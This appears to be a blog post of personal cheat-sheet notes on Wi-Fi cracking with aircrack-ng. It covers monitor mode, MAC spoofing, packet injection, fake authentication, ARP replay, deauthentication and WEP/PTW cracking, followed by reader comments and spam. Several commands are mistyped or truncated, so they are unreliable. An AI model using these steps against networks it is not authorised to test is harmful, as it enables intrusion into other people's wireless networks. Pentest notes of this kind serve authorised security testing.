--------------------------------------------------------------------
install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)
Steps:
#####################################################
CONFIGURATION:
D-Link DWL-G122
ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel
NetGear WG511T
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
specify channel
iwocnfig ath0 channel n
########################################################
CHANGING MAC ADDRESS
ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up
use macchanger instead
#########################################################
INJECTION TESTING
NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122
aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================
Card-To-Card Injection:
Make sure they are on same channel using
iwlist
aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================
########################################################
PACKET CAPTURE:
airodump-ng device (find out first the interested bssid and channel)
Then capture packets on that particular channel:
airodump-ng --channel
Notes: capture full packets when using PTW attack (don't dump ivs only)
MERGING capture files (RESUMING)
mergecap -w out.cap test1.cap test2.cap test3.cap
FOR IVS
use ivstools
############################################################
ATTACKS
You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0
Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0
ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)
aireplay-ng --arpreplay -b
Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)
#############################################################
WEP CRACKING
Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)
aircrack-ng -z -b
40-bit = 20,000
104-bit = 40,000
Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile
#########################################################
RESOLVE MAC Address to IP Address
use netdiscover or ARP tools
##########################################################
Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.
#######################################################
Increasing injection Speed
iwconfig device rate 11M
#####################################################
---------------------------------------------------------------------------
The Hacka Man
 
 
 
 
 
 
 
 
 
 
 
9 comments:
Have you personally try those commands in pentesting? YES or NO?
Are you using 'aircrack-ng suit' in MS Windows or Linux? or VM in windows? or Live-CD/USB?
Have you tried Auditor/Backtrack/Backtrack2/CoWAPPty with success wireless pentesting??
Do you agree any 'Certified IT' programme will not accept 'typo error' especially in 'Command'?
I'm just curios and all this bring to me what tools you use in your earlier post regarding gainning access to a router, how you did it too?
Are you using CommView for WiFi/Cain & Abel/Wireshark?
Hi there.. mark here. thanks for acknowledging me dude. Here's my response to the previous post. The commands I have noted are not step by step walkthrough on wireless pentesting. I got everything working on my
here's the link to my blog.. http://matat0.blogspot.com
hi,thanks.i try and rt73 very good chipset.support injection.i can get the ket around 3 minute with windows+vmware.just find tutorial here Tutorial Cracking WEP In 3 Minute
When you "copy paste" a cracking tutorial, for your own sake please at least try it first. The guy before already pointed about your error in command typo, yet you still didn't find it? what a great certified hacker.
[color=#5588aa]How to utilize the advanced search? It was extended because, [/color] [url=http://carlimelkpart.chez.com/nexium.html] need[/url] [color=#5588aa]search criteria[/color]!
[color=#5588aa]Thanks for the sake of the treatment of waiting representing all![/color]
The average length of an orgasm for a pig is 30 minutes.online cash advance
The king of hearts is the only king without a moustache.notebook reviews
If you compare the weight, a hamburger is more expensive than a car.Contact lenses
Post a Comment